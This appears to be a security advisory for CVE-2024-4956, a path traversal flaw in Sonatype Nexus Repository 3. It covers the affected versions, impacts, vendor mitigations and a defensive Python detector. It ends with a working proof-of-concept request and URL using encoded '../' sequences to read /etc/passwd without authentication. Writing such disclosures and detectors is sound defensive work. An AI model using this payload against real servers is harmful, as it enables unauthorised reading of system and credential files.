Vulnerable Version
versions 3.0 to 3.68.0
Fixed Version
version 3.68.1
Base Score
7.5 HIGH
Vendor Description:-
Sonatype Nexus Repository Manager is a tool that stores and manages software artifacts like libraries, binary files, and dependencies. It’s used to build software and is available as open source and proprietary software.
CVE-2024-4956 Vulnerability Description:-
Path traversal, also known as directory traversal, is a web security vulnerability that allows an attacker to access directories and files on a server outside the web root directory. By manipulating variables that reference files with dot-dot-slash (../) sequences and their variations, attackers can navigate the server’s file system and potentially read sensitive files such as configuration files, user data, and application code.
For example, if a web application takes a file name as input and appends it to a directory path without proper validation, an attacker might input ../../etc/passwd to gain unauthorized access to the system’s password file.
This vulnerability allows an attacker to craft a URL to download system files outside the scope of the Nexus Repository application, without any authentication. This poses a significant risk as it can expose sensitive system files and potentially compromise the security of the environment where Nexus Repository is installed.
Impacts:-
- Unauthorized File Access – Attackers can retrieve sensitive configuration files, API keys, credentials, and other critical data.
- Potential Server Compromise – Exposure of sensitive files may lead to privilege escalation, lateral movement, or remote code execution (RCE).
- Disruption & Data Breach – Could impact repository integrity, leak proprietary artifacts, or disrupt DevOps pipelines.
Mitigations:-
The official Sonatype support page of the vulnerability suggests upgrading to Nexus Repository version 3.68.1 or later. Download the latest version from here.
While Sonatype recommends upgrading, they understand that an immediate upgrade might not be feasible for everyone, so they offer the following temporary mitigation options.
- Editing the jetty.xml configuration:
  - Modify (basedir)/etc/jetty/jetty.xml by removing <Set name="resourceBase"><Property name="karaf.base"/>/public</Set>.
  - This disables file loading from the (installdir)/public directory, restricting certain functionalities.
- AWS WAF core rule adjustment:
  - If using AWS WAF, apply the GenericLFI_URIPATH rule to block malicious attempts.
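The mitigations above either stop Jetty serving the public directory or rely on a WAF rule to catch encoded traversal sequences. As an added example (not Sonatype's code and not part of the original advisory), the script below shows both halves of that defence in Python: a detector that percent-decodes request paths, including double-encoded ones, and flags any ".." segment, and a server-side resolver that confines a requested file to a base directory. The base directory /opt/nexus/public and the sample request paths are constructed for illustration.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote

# Constructed sample request paths (not real logs). The first mirrors the
# encoded "%2f..%2f" pattern from the PoC; the second is double-encoded.
SAMPLE_PATHS = [
    "/%2f%2f%2f%2f..%2f..%2f..%2f../etc/passwd",
    "/static/%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "/repository/maven-public/org/example/lib/1.0/lib-1.0.jar",
    "/nexus/images/logo.png",
]


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so %252f -> %2f -> / is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal_attempt(raw_path: str) -> bool:
    """Detection: true if the decoded path contains a '..' path segment."""
    decoded = fully_decode(raw_path).replace("\\", "/")
    return ".." in decoded.split("/")


def scan_paths(paths: List[str]) -> List[str]:
    """Return the request paths that look like traversal attempts."""
    return [p for p in paths if is_traversal_attempt(p)]


def resolve_within(base_dir: str, raw_path: str) -> Optional[str]:
    """Mitigation: map raw_path under base_dir, or None if it escapes it.

    The request is decoded, joined onto the base and normalised; only a
    result that is the base itself or lies beneath it is accepted.
    """
    base = posixpath.normpath(base_dir)
    relative = fully_decode(raw_path).replace("\\", "/").lstrip("/")
    target = posixpath.normpath(posixpath.join(base, relative))
    if target == base or target.startswith(base + "/"):
        return target
    return None


if __name__ == "__main__":
    print("flagged:", scan_paths(SAMPLE_PATHS))
    for p in SAMPLE_PATHS:
        print(p, "->", resolve_within("/opt/nexus/public", p))
```

The detector is suitable for running over access-log URIs, while the resolver is the check a file-serving handler should perform before opening anything.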
POC
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Or you can enter the URL directly in the browser:
http://<target>//%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd


POC video:-
References:-
https://www.vicarius.io/vsociety/posts/path-traversal-in-sonatype-nexus-repository-3-cve-2024-4956
